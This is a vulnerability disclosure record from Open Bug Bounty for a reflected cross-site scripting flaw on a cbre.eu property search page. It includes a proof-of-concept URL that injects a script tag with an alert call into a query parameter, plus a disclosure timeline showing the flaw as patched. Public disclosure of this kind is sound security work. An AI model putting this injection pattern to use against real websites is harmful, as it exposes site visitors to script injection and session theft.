cbre.eu XSS vulnerability

2017-11-11T14:17:00
ID OBB:409610
Type openbugbounty
Reporter M0r3h4x
Modified 2017-12-14T05:37:00

Description

Vulnerable URL:
http://www.cbre.eu/PropertySearchDataCentreNew/htdocs/searchresults/includeSearchResults.jsp?pager.offset=25&name;=xss%3C/script%3E%3Cscript%3Ealert(%27openbugbounty%27)%3C/script%3E&letOrSale;=&selCode;=null&regionCode;=null&countryCode;=&sizeMin;=null&sizeMax;=null&priceMin;=null&priceMax;=null&addedProperty;=null&mapView;=N&uomlCode;=null&curCode;=null&orderBy;=null%20ASC,%20COU_DESCRIPTION%20ASC&display;=25&p;_pageGroup=uk_datacentre&p;_page=searchresults&p;_action=null&sessionId;=5d014b32bd63ae8d401d03bac08036cdb0956c2615009c98ecb07648266f5110
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 444003
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 November, 2017 14:17 GMT
Generic security notifications sent to website owner| 11 November, 2017 14:20 GMT
Vulnerability details disclosed by researcher| 13 December, 2017 16:18 GMT
Vulnerability patched by the website owner| 14 December, 2017 05:37 GMT